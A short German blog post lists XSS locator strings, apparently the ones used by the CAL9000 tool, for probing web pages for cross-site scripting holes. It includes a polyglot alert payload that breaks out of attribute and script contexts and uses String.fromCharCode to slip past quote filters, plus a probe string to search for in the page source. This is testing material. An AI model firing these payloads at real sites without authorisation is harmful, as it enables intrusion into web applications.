ROAE-Blog

Folgende Strings helfen schnell und einfach bei der Lokalisierung der XSS-Lücken. Sie werden auch bei CAL9000 zur Identifizierung von Schwachstellen verwendet:

Variante 1:
Hier wird auf verschiedene Arten versucht eine Alert-Meldung auszuführen. Durch ‘ bzw. “ wird versucht z.B. aus einem Value-Attribut eines Input-Feldes auszubrechen. Durch fromCharCode kann es umgangen werden wenn auf “ oder ‘ gefiltert wird:
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>“>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Variante 2:
Bei dieser Variante muss der Quelltext nach &lt;XSS bzw. <XSS durchsucht werden.

'';!--"=&{()}